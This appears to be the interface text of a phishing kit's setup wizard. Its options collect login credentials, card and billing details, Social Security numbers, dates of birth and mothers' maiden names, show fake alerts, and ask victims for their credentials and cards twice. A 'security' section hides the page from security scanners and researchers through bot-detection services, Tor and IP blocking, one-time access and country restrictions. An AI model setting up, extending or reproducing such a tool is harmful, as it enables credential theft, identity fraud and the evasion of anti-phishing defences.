1 Requirements
2 Configuration
3 Complete

Configuration

Essential Configuration

Basic Configuration

Enables fake alert notification after users input credentials
Enables billing information collection
Collects email address information during the process
Skips the initial OAuth confirmation page
Enables Social Security Number collection field
Enables Customer ID collection field
Enables Date of Birth collection field
Enables Mother's Maiden Name collection field

Alert Configuration

Choose which alert page type to show to users

Double Configuration

Requests login credentials twice for verification purposes
Requests card information twice for verification purposes
Requests email verification twice for confirmation
Saves webshop information to the database

Security Configuration

API Configuration

Bot Protection

Uses Blackbox V1 API for basic bot detection (Recommended)
Advanced bot detection with enhanced security
Uses Stopbot API to detect and block bots
Uses Botblocker API for advanced bot detection

Request Validation

Validates URL parameters to prevent unauthorized access
Validates HTTP headers to detect suspicious requests
Validates browser user-agent strings to detect bots
Verifies browser cookie support and consistency
Validates browser characteristics to detect automation tools

Access Control

Checks IP addresses against known malicious IP databases
Blocks access from TOR network exit nodes
Validates hostnames to detect suspicious connections
Verifies request origin against allowed domains

Rate Limiting & Access Restrictions

Limits the number of requests from a single IP address
Allows only one-time access per session
Restricts access to specified countries only
Enter two-letter ISO country codes. Only visitors from these countries will be allowed.
Previous Step